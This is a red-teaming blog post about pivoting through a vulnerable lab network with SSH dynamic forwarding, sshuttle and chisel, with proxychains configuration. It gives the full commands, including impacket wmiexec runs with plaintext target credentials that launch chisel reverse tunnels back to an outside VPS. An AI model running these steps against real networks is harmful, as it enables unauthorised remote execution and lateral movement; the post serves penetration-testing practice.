Categories
red teaming

Pivoting Down the Rabbit Hole

I remember one of the first security competitions I did when in school, our team was beat out by the team that was able to pivot within the environment of intentionally vulnerable systems. Since then I've been able to learn some of ways that you can move between systems. This post documents a few different ways through the use of SSH Dynamic Port Forwarding, sshuttle, and chisel. If this post seems confusing when making the connections, read through it's entirety and make adjustments to fit your needs. Without further ado, let's take that red pill!

Making Connections

Link #1
SSH Dynamic Port Forwarding
Local Kali system (Host1) --> Virtual Private Server (Host2)

root@eternalnoob:~# ssh -N -D 9050 -i /root/id_rsa1 thenoob@eternalnoob_vps

This establishes the first link in the chain, opening a port on Host1 connecting to Host2 (which is connected to a VPN with the environment we're targeting).

Links #2 and #3
sshuttle
Virtual Private Server (Host2) --> Target1 & VPN Environment

thenoob@eternalnoob_vps:~$ sshuttle -vv -r victim1@target1 --ssh-cmd='ssh -i /root/id_rsa2' 172.16.1.0/24

This establishes the second and third links in the chain, bridging the connection to the VPN target environment.

Link #4
chisel
Target2 --> Target3

Since we're now connected to the VPN environment, we can use Target2 to establish the connection to Target3. In order to use chisel to establish a SOCKS proxy, we need to do a few different steps.

  1. First start the chisel server, on Host2, listening on port 8000 for incoming connections. The --auth flag is used for authenticated connections, but isn't required.
    thenoob@eternalnoob_vps:~$ ./chisel server -p 8000 --reverse --auth thenoob:secretsockspassword

  2. Next, we create a client, on Target2, for the server we created in step one. Note: the chisel executable needs to be transferred over prior to these next steps in order to be executed
    From Host1:
    root@eternalnoob:~# proxychains python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe client --auth thenoob:secretsockspassword 10.10.13.3:8000 R:2222:127.0.0.1:1111
    Or from Host2:
    thenoob@eternalnoob_vps:~$ python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe client --auth thenoob:secretsockspassword 10.10.13.3:8000 R:2222:127.0.0.1:1111

  3. Then create a server on Target2, using the same chisel executable from step two.
    From Host1:
    root@eternalnoob:~# proxychains python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe server --auth thenoob:secretsockspassword -p 1111 --socks5'
    Or from Host2:
    thenoob@eternalnoob_vps:~$ python /opt/impacket/examples/wmiexec.py victim2:password@target2 'c:\users\public\chisel.exe server --auth thenoob:secretsockspassword -p 1111 --socks5'

  4. And finally create a client back on Host2 that connects to the server created back in step three.
    thenoob@eternalnoob_vps:~$ ./chisel client --auth thenoob:secretsockspassword localhost:2222 1081:socks

So now that we have that SOCKS proxy established we can reach Target3 from Host1. Modify the bottom of the /etc/proxychains.conf file to add this link.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
socks5 127.0.0.1 1081 thenoob secretsockspassword

Note: see below how the chain first connects to 127.0.0.1:9050 (Link #1), uses the connections established on Host2 (Links #2 and #3), and then connects to 127.0.0.1:1081 (Link #4), and finally hits the RDP connection on Target3

If you want to keep going down the rabbit hole to Links #5 and so on, you can repeat the steps found in Link #4. However, some of the port numbers would need to be modified as they're currently being used in Link #4. For simplicity's sake, you could increment the port numbers in each of the steps, repeat these steps on Target3, and then modify the bottom of the /etc/proxychains.conf file to add the subsequent links.

[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4 127.0.0.1 9050
#socks5 127.0.0.1 1081 thenoob secretsockspassword
socks5 127.0.0.1 1082 thenoob secretsockspassword

Note: the socks5 proxy (port 1081) is commented out if Link #5 is needed to be used. Flip it, if Link #4 is needed

Other considerations when using Proxychains:

  • Comment out quiet_mode in the conf file to help debug your connection if needed. Uncomment quiet_mode if the output is too much to handle.
  • Comment out proxy_dns if you don't need to proxy the DNS requests

Resources

  • https://0xdf.gitlab.io/2019/01/28/tunneling-with-chisel-and-ssf.html
  • https://www.techrepublic.com/article/how-to-use-ssh-as-a-vpn-with-sshuttle/
  • Leave a Reply

    Your email address will not be published. Required fields are marked *

    eighteen + 7 =